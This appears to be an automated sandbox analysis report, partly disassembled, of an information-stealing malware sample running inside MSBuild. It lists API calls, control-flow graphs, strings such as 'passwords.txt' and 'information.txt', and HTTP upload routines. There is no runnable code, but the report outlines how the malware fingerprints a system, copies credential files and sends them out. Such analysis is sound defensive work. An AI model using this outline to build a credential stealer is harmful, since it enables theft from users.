                                                                                          • Part of subcall function 0040FD30: HeapAlloc.KERNEL32(00000000), ref: 0040FD4C
                                                                                          • Part of subcall function 0040FD30: RegOpenKeyExA.KERNEL32(80000002,01690790,00000000,00020119,00000000), ref: 0040FD6B
                                                                                          • Part of subcall function 0040FD30: RegQueryValueExA.KERNEL32(00000000,01699B08,00000000,00000000,00000000,000000FF), ref: 0040FD86
                                                                                          • Part of subcall function 0040FD30: RegCloseKey.ADVAPI32(00000000), ref: 0040FD90
                                                                                          • Part of subcall function 0040FDE0: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 0040FE02
                                                                                          • Part of subcall function 0040FDE0: GetLastError.KERNEL32(?,00000030), ref: 0040FE10
                                                                                          • Part of subcall function 0040FDE0: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 0040FE48
                                                                                          • Part of subcall function 0040FDE0: wsprintfA.USER32 ref: 0040FE92
                                                                                          • Part of subcall function 0040FDA0: GetSystemInfo.KERNEL32(00000000), ref: 0040FDAD
                                                                                          • Part of subcall function 0040FDA0: wsprintfA.USER32 ref: 0040FDC3
                                                                                          • Part of subcall function 0040FED0: GetProcessHeap.KERNEL32(00000000,00000104,?,TimeZone: ,00000000,?,00423408,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00423408), ref: 0040FEDE
                                                                                          • Part of subcall function 0040FED0: HeapAlloc.KERNEL32(00000000,?,TimeZone: ,00000000,?,00423408,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00423408,00000000), ref: 0040FEE5
                                                                                          • Part of subcall function 0040FED0: GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 0040FF05
                                                                                          • Part of subcall function 0040FED0: wsprintfA.USER32 ref: 0040FF2B
                                                                                          • Part of subcall function 0040FF40: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 0040FF71
                                                                                          • Part of subcall function 0040FF40: EnumDisplayDevicesA.USER32(00000000,00000001,000001A8,00000001), ref: 0040FFA9
                                                                                          • Part of subcall function 00410200: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410228
                                                                                          • Part of subcall function 00410200: Process32First.KERNEL32(00000000,00000128), ref: 00410238
                                                                                          • Part of subcall function 00410200: Process32Next.KERNEL32(00000000,00000128), ref: 0041024A
                                                                                          • Part of subcall function 00410200: Process32Next.KERNEL32(00000000,00000128), ref: 0041029E
                                                                                          • Part of subcall function 00410200: CloseHandle.KERNEL32(00000000), ref: 004102A9
                                                                                          • Part of subcall function 0040FFC0: RegOpenKeyExA.KERNEL32(00000000,01696E38,00000000,00020019,00000000,004201E9), ref: 00410009
                                                                                          • Part of subcall function 0040FFC0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410052
                                                                                          • Part of subcall function 0040FFC0: wsprintfA.USER32 ref: 0041007C
                                                                                          • Part of subcall function 0040FFC0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0041009A
                                                                                          • Part of subcall function 0040FFC0: RegQueryValueExA.KERNEL32(00000000,0169A7A0,00000000,000F003F,?,00000400), ref: 004100CA
                                                                                          • Part of subcall function 0040FFC0: lstrlenA.KERNEL32(?), ref: 004100DF
                                                                                          • Part of subcall function 0040FFC0: RegQueryValueExA.KERNEL32(00000000,0169A578,00000000,000F003F,?,00000400,00000000,?,?,00000000,80000002,00423408), ref: 00410156
                                                                                        • lstrlenA.KERNEL32(00000000,00000000,?,00423684,00000000,?,00000000,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00414F07
                                                                                          • Part of subcall function 004142A0: Sleep.KERNEL32(000003E8,?,=OA,?,?,00000000), ref: 00414345
                                                                                          • Part of subcall function 004142A0: CreateThread.KERNEL32(00000000,00000000,004130F0,?,00000000,00000000), ref: 0041438D
                                                                                          • Part of subcall function 004142A0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00414399
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$Process$Alloc$wsprintf$CreateOpen$CloseInformationInitializeQueryValuelstrcpy$EnumLocalNameProcess32lstrlen$BlanketCapsCurrentDeviceDevicesDisplayHandleInfoInitInstanceKeyboardLayoutListLogicalNextProcessorProxySecurityTimeVariantlstrcat$CharComputerDirectoryErrorFileFirstFreeGlobalLastLocaleMemoryModuleObjectProfileReleaseSingleSleepSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
                                                                                        • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                        • API String ID: 521975125-1014693891
                                                                                        • Opcode ID: 5435da33b2de04845b7793e5cb1a589c3754c45eed5c8e45830fad84ddd5cd33
                                                                                        • Instruction ID: ed390803ddffb7dbb27509b1d163b9a87a989646b63db68027920e85455424b0
                                                                                        • Opcode Fuzzy Hash: 5435da33b2de04845b7793e5cb1a589c3754c45eed5c8e45830fad84ddd5cd33
                                                                                        • Instruction Fuzzy Hash: 2D623073D101086EDB15FBA1D952DDEB3789E14304B6482BFB112728D2AF397B0DCA69
                                                                                        Function 00405BB0 Relevance: 44.3, APIs: 21, Strings: 4, Instructions: 584networkstringmemoryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2260 405bb0-405c5f call 40f850 call 403d70 call 40f810 * 5 call 40fa50 InternetOpenA StrCmpCA 2277 405c61 2260->2277 2278 405c64-405c66 2260->2278 2277->2278 2279 406246-406267 InternetCloseHandle call 40fa50 call 406cd0 2278->2279 2280 405c6c-405daa call 410b80 call 40f940 call 40f8f0 call 40f890 * 2 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f940 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f940 call 40f8f0 call 40f890 * 2 InternetConnectA 2278->2280 2289 406294-4062fa call 410ab0 * 2 call 40f890 * 9 2279->2289 2290 406269-40628f call 40f8a0 call 40f9a0 call 40f8f0 call 40f890 2279->2290 2366 405db0-405de3 HttpOpenRequestA 2280->2366 2367 406243 2280->2367 2290->2289 2368 406239-406240 InternetCloseHandle 2366->2368 2369 405de9-405deb 2366->2369 2367->2279 2368->2367 2370 405e03-4061d8 call 40f9a0 call 40f8f0 call 40f890 call 40f940 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f940 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f940 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 401ed0 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f940 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f940 call 40f8f0 call 40f890 call 40fa50 lstrlenA call 40fa50 lstrlenA GetProcessHeap HeapAlloc call 40fa50 lstrlenA call 40fa50 memcpy call 40fa50 lstrlenA call 40fa50 * 2 lstrlenA memcpy call 40fa50 lstrlenA call 40fa50 HttpSendRequestA InternetReadFile 2369->2370 2371 405ded-405dfd InternetSetOptionA 2369->2371 2530 4061da 2370->2530 2531 40622f-406236 InternetCloseHandle 2370->2531 2371->2370 2532 4061e0-4061e5 2530->2532 2531->2368 2532->2531 2533 4061e7-40622d call 40f9a0 call 40f8f0 call 40f890 InternetReadFile 2532->2533 2533->2531 2533->2532
                                                                                        APIs
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                          • Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DA2
                                                                                          • Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DAF
                                                                                          • Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DBC
                                                                                          • Part of subcall function 00403D70: lstrlenA.KERNEL32(00000000,00000000,0000003C,00000000,?,00000030), ref: 00403DD6
                                                                                          • Part of subcall function 00403D70: InternetCrackUrlA.WININET(00000000,00000000), ref: 00403DE6
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405C3C
                                                                                        • StrCmpCA.SHLWAPI(?,0169A3B0,?,?,?,?,?,?,00000030), ref: 00405C57
                                                                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405D9D
                                                                                        • HttpOpenRequestA.WININET(00000000,0169A460,?,0169B128,00000000,00000000,-00400100,00000000), ref: 00405DD9
                                                                                        • lstrlenA.KERNEL32(00000000,00000000,00416BDF,?,00000000,00416BDF,",00000000,00416BDF,mode,00000000,00416BDF,0168FC00,00000000,00416BDF,00423358), ref: 0040611D
                                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000030), ref: 0040612E
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00000030), ref: 00406139
                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000030), ref: 00406140
                                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000030), ref: 00406151
                                                                                        • memcpy.MSVCRT ref: 00406162
                                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000030), ref: 00406173
                                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000030), ref: 0040618C
                                                                                        • memcpy.MSVCRT ref: 00406195
                                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 004061A8
                                                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004061B9
                                                                                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004061D0
                                                                                        • InternetReadFile.WININET(00000000,00000000,000000C7,?), ref: 00406225
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00406230
                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405DFD
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
                                                                                          • Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0040623A
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00406247
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Internet$lstrlen$lstrcpy$CloseHandle$FileHeapHttpOpenReadRequestlstrcatmemcpy$AllocConnectCrackOptionProcessSend
                                                                                        • String ID: "$------$build_id$mode
                                                                                        • API String ID: 530647464-3829489455
                                                                                        • Opcode ID: ca39fe1fc220ddcbd9e97779eae753f342515fee96dcff701229d1bead8309d7
                                                                                        • Instruction ID: 2342e7445195f74e1bbe978696abae846b25583d2ac747dccbea70769e672dee
                                                                                        • Opcode Fuzzy Hash: ca39fe1fc220ddcbd9e97779eae753f342515fee96dcff701229d1bead8309d7
                                                                                        • Instruction Fuzzy Hash: 1222EE72910108AEDB15FBA1DC92EEE7778AF54704F54817EB502724D1EF386A0DCBA8
                                                                                        Function 0040BF30 Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 286stringfilememoryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                          • Part of subcall function 00410B80: GetSystemTime.KERNEL32(004201E9,0168FCC0,004201E9,?,00000030,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 00410BA9
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
                                                                                          • Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040BFD7
                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C00B
                                                                                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040C069
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0040C070
                                                                                        • lstrlenA.KERNEL32(00000000,00000000), ref: 0040C10C
                                                                                        • lstrcatA.KERNEL32(00000000,0168EF98), ref: 0040C123
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 0040C133
                                                                                        • lstrcatA.KERNEL32(00000000,004234BC), ref: 0040C13F
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 0040C14F
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                          • Part of subcall function 004110F0: memset.MSVCRT ref: 0041110A
                                                                                          • Part of subcall function 004110F0: GetProcessHeap.KERNEL32(00000000,000000FA,00000000,00000000,?,00409753,00409C77), ref: 0041113D
                                                                                          • Part of subcall function 004110F0: HeapAlloc.KERNEL32(00000000,?,00409753,00409C77), ref: 00411144
                                                                                          • Part of subcall function 004110F0: wsprintfW.USER32 ref: 00411153
                                                                                          • Part of subcall function 004110F0: OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 004111BB
                                                                                          • Part of subcall function 004110F0: TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 004111CA
                                                                                          • Part of subcall function 004110F0: CloseHandle.KERNEL32(00000000,?,?), ref: 004111D1
                                                                                        • lstrcatA.KERNEL32(00000000,004234B8), ref: 0040C15B
                                                                                        • lstrcatA.KERNEL32(00000000,0168EE08), ref: 0040C169
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 0040C179
                                                                                        • lstrcatA.KERNEL32(00000000,00423408), ref: 0040C185
                                                                                        • lstrcatA.KERNEL32(00000000,0168EE28), ref: 0040C192
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 0040C1A2
                                                                                        • lstrcatA.KERNEL32(00000000,00423408), ref: 0040C1AE
                                                                                        • lstrcatA.KERNEL32(00000000,016996C8), ref: 0040C1BC
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 0040C1CC
                                                                                        • lstrcatA.KERNEL32(00000000,00423408), ref: 0040C1D8
                                                                                        • lstrcatA.KERNEL32(00000000,00423408), ref: 0040C1E4
                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0040C211
                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 0040C275
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcat$lstrcpy$HeapProcess$Filelstrlen$Copy$AllocAllocateCloseDeleteHandleOpenSystemTerminateTimememsetwsprintf
                                                                                        • String ID: passwords.txt
                                                                                        • API String ID: 2344884248-347816968
                                                                                        • Opcode ID: 6c6631d7537a75886b13321184486968400d058f1e88fc6ffe80464b267e8130
                                                                                        • Instruction ID: 967a70a3d716286beb5b4252a3fafd026a216bdc4be784f124d06add54286a45
                                                                                        • Opcode Fuzzy Hash: 6c6631d7537a75886b13321184486968400d058f1e88fc6ffe80464b267e8130
                                                                                        • Instruction Fuzzy Hash: DBA14D72A00105ABCB14FBA1ED5ADEE377DAF54305F149039F502B2591EF386A09CBB9
                                                                                        Function 00407160 Relevance: 32.0, APIs: 21, Instructions: 482stringfilememoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040FA20: StrCmpCA.SHLWAPI(?,00423410,?,004090A5,00423410,00000000), ref: 0040FA2A
                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040725E
                                                                                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040744B
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00407452
                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00407292
                                                                                          • Part of subcall function 0040F8A0: lstrlenA.KERNEL32(004176BE,?,00000000,?,00416587,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 0040F8AB
                                                                                          • Part of subcall function 0040F8A0: lstrcpyA.KERNEL32(00000000,004176BE), ref: 0040F8E2
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                          • Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
                                                                                          • Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D
                                                                                        • lstrcatA.KERNEL32(00000000,00000000,00000000,0169A230,00423410,0169A230,00423410,00000000), ref: 0040757D
                                                                                        • lstrcatA.KERNEL32(00000000,0042340C), ref: 00407589
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 00407599
                                                                                        • lstrcatA.KERNEL32(00000000,0042340C), ref: 004075A5
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 004075B5
                                                                                        • lstrcatA.KERNEL32(00000000,0042340C), ref: 004075C1
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 004075D1
                                                                                        • lstrcatA.KERNEL32(00000000,0042340C), ref: 004075DD
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 004075ED
                                                                                        • lstrcatA.KERNEL32(00000000,0042340C), ref: 004075F9
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 00407609
                                                                                        • lstrcatA.KERNEL32(00000000,0042340C), ref: 00407615
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 00407652
                                                                                        • lstrcatA.KERNEL32(00000000,00423408), ref: 00407666
                                                                                        • lstrlenA.KERNEL32(00000000), ref: 004076B3
                                                                                        • lstrlenA.KERNEL32(00000000), ref: 004076BF
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                        • DeleteFileA.KERNEL32(00000000,?,?,?,004201E9), ref: 0040771A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcat$lstrcpy$lstrlen$File$CopyHeap$AllocateDeleteProcess
                                                                                        • String ID:
                                                                                        • API String ID: 510441641-0
                                                                                        • Opcode ID: b115433a796c70727ddb27c2892003f97d66e6a6fffaa7df257ef16394880564
                                                                                        • Instruction ID: 7c427e6bb88bbe56a8d38efa81964618216df7dc27c3b8011e4d2415417106fc
                                                                                        • Opcode Fuzzy Hash: b115433a796c70727ddb27c2892003f97d66e6a6fffaa7df257ef16394880564
                                                                                        • Instruction Fuzzy Hash: 82026D72A10104ABCB24FBA1DC56DEE7779AF10305F54813AF506764E2EF386A0DCB69
                                                                                        Function 00408DD0 Relevance: 31.9, APIs: 21, Instructions: 390stringfilememoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                          • Part of subcall function 00410B80: GetSystemTime.KERNEL32(004201E9,0168FCC0,004201E9,?,00000030,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 00410BA9
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
                                                                                          • Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00408E75
                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00408EAA
                                                                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00408FC9
                                                                                        • lstrcatA.KERNEL32(00000000,00000000,0169A230,00423410,0169A230,00423410,00000000), ref: 004090F3
                                                                                        • lstrcatA.KERNEL32(00000000,0042340C), ref: 004090FF
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 0040910F
                                                                                        • lstrcatA.KERNEL32(00000000,0042340C), ref: 0040911B
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 0040912B
                                                                                        • lstrcatA.KERNEL32(00000000,0042340C), ref: 00409137
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 00409147
                                                                                        • lstrcatA.KERNEL32(00000000,0042340C), ref: 00409153
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 00409163
                                                                                        • lstrcatA.KERNEL32(00000000,0042340C), ref: 0040916F
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 0040917F
                                                                                        • lstrcatA.KERNEL32(00000000,0042340C), ref: 0040918B
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 0040919B
                                                                                        • lstrcatA.KERNEL32(00000000,00423408), ref: 004091A7
                                                                                        • lstrlenA.KERNEL32(00000000), ref: 004091FC
                                                                                        • lstrlenA.KERNEL32(00000000), ref: 00409208
